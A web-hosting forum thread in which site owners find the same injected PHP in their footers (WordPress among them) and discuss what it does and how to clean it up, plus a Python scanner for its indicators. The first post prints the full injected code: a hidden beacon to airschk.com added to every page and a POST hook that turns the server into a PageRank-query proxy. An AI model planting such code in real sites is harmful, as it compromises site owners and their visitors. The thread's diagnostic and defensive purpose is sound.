I got this unexpectedly... someone inserted this into my site footer. What does this code do?

Code (markup):
<div id="l64dae84c467843a09b8007f50"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae84c467843a09b8007f50&a=%97%3FiI%0A%8FQ%C5H%ED%B1%E6%E1G%EAz_%B2%10%14%28%F2%F9%DB2%BDis%ABP%E3%CE%0F7S%D3%F0%0Ape"></div>
This is the full code... does anyone know what this will do to my site?

PHP:
<?php
//{{126104ed
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
    $alreadyxxx = 1;
    $olderrxxx=error_reporting(0);
    function outputxxx_callback($str)
    {
        $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
        preg_match("|</body>|si",$str,$arr);
        return str_replace($arr[0],$links.$arr[0],$str);
    }
    function StrToNum($Str, $Check, $Magic)
    {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++)
        {
            $Check *= $Magic;
            if ($Check >= $Int32Unit)
            {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str{$i});
        }
        return $Check;
    }
    function HashURL($String)
    {
        $Check1 = StrToNum($String, 0x1505, 0x21);
        $Check2 = StrToNum($String, 0, 0x1003F);
        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
        return ($T1 | $T2);
    }
    function CheckHash($Hashnum)
    {
        $CheckByte = 0;
        $Flag = 0;
        $HashStr = sprintf('%u', $Hashnum) ;
        $length = strlen($HashStr);
        for ($i = $length-1; $i >= 0; $i--)
        {
            $Re = $HashStr{$i};
            if (1 === ($Flag % 2))
            {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag ++;
        }
        $CheckByte %= 10;
        if (0 !== $CheckByte)
        {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2) )
            {
                if (1 === ($CheckByte % 2))
                {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }
        return '7'.$CheckByte.$HashStr;
    }
    function getpr($url)
    {
        $ch = CheckHash(HashURL($url));
        $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
        $data = file_get_contents($file);
        $pos = strpos($data, "Rank_");
        if($pos === false){return -1;}
        else{
            $pr=substr($data, $pos + 9);
            $pr=trim($pr);
            $pr=str_replace(" ",'',$pr);
            return $pr;
        }
    }
    if(isset($_POST['xxxprch']))
    {
        echo getpr($_POST['xxxprch']);
        exit();
    }
    else
        ob_start('outputxxx_callback');
    error_reporting($olderrxxx);
}
//}}861921ab
The image is used to notify the script kiddies that there is a backdoor on your site. Does your host use mod_security? If they don't, ask them to implement it. Are your scripts up-to-date? If they aren't, upgrade urgently. You should restore your site from a backup, just in case the attacker has also affected other files that you are not aware of. If you don't have (recent) backups, search all folders for suspicious files or check your access logs.
I searched and removed it manually... Also, is this something I can use htaccess to block? I am a newbie when it comes to hosting. My host is 1and1.com. Thanks,
No, you can't block them with htaccess. The most you can do with htaccess is block the IP address of a particular attacker, but it wouldn't prevent attacks from a random attacker/bot. I could be wrong, but as far as I know 1&1 doesn't use mod_security, Suhosin (hardened PHP), suPHP or anything similar. These are the essentials for a security-conscious host. While your site should be fairly safe at 1&1 if you constantly update all your scripts (including add-ons), you should consider moving to a hosting company that takes the security of the clients' sites more seriously.
What script are you using? This is usually a sign of a security glitch. Run a virus scan from your hosting control panel; that usually fixes it without having to remove it manually.
I use a couple of different scripts, including WordPress, and every single site on my server is affected. My question is: how can this be inserted into my .php file? Thanks
If one of your scripts has any security glitch, then it can spread from one single file and execute an attack on all the files on the server. I would recommend you do a full scan of your server and remove all the traces of the code. This happened to me a few months ago and I had to do a full scan of my server. Surprisingly, I found 1000+ files infected; then I reported this to my script company and they provided me with a patch. You can read more about script vulnerabilities here: en.wikipedia.org/wiki/Cross-site_scripting
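A read-only scan for the traces this thread describes, as an added example that is not part of any post above: it walks a web root and reports files containing strings from the injected code quoted in the first post (the airschk.com/countbk.gif beacon, outputxxx_callback, $alreadyxxx, xxxprch), plus the line span of any //{{... to //}}... block. The function names, the extension list and the assumption that the 8-hex-digit marker ids differ between infections belong to this example; the sample files are constructed.

```python
import os
import re
import tempfile

# Indicators copied from the injected code quoted in this thread.
INDICATORS = {
    "beacon_url": re.compile(rb"airschk\.com/countbk\.gif"),
    "ob_callback": re.compile(rb"outputxxx_callback"),
    "guard_var": re.compile(rb"\$alreadyxxx"),
    "post_param": re.compile(rb"xxxprch"),
}
# Assumption: the 8-hex-digit ids in the //{{ ... //}} markers vary per infection.
BLOCK = re.compile(rb"//\{\{[0-9a-f]{8}.*?//\}\}[0-9a-f]{8}", re.S)
EXTENSIONS = (".php", ".phtml", ".inc", ".html", ".htm", ".tpl")

def scan_file(path):
    """Return (indicator names, [(first_line, last_line)] of marker blocks)."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(data))
    spans = [(data.count(b"\n", 0, m.start()) + 1, data.count(b"\n", 0, m.end()) + 1)
             for m in BLOCK.finditer(data)]
    return hits, spans

def scan_tree(root):
    """Walk root and report every file with at least one indicator or block."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(dirpath, name)
                hits, spans = scan_file(path)
                if hits or spans:
                    report[os.path.relpath(path, root)] = (hits, spans)
    return report

def demo():
    """Scan a constructed web root: one clean file, one infected footer."""
    infected = (b"<?php //{{126104ed\nGLOBAL $alreadyxxx;\n"
                b"ob_start('outputxxx_callback');\n//}}861921ab\n?>\n</body>\n")
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "theme"))
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(b"<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "theme", "footer.php"), "wb") as fh:
            fh.write(infected)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point scan_tree at the real document root instead of the constructed one; it only reports, so restoring from backup or cleaning the listed files is still a separate step.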
The same happened to me last week. The weird thing is all my sites on three different servers were hacked with the same exact code you posted above! I had to recover one of my WordPress installations manually as I couldn't find a recent backup! And I am still working on the other sites! This is a nightmare as I have more than 40 WP installations that might be infected! Basically, from what I see, this code tries to steal Rank or Traffic!
The same happened to me last week too, and I fixed it after I got a message from Google informing me that my websites may have been hacked. From the searching I did, it was some attack based on a botnet using a WP bug.
You need to sanitize inputs on your site so this kind of stuff doesn't happen in the future. Search Google for "sanitizing php input". These attacks are common so it's up to the programmer to protect against them!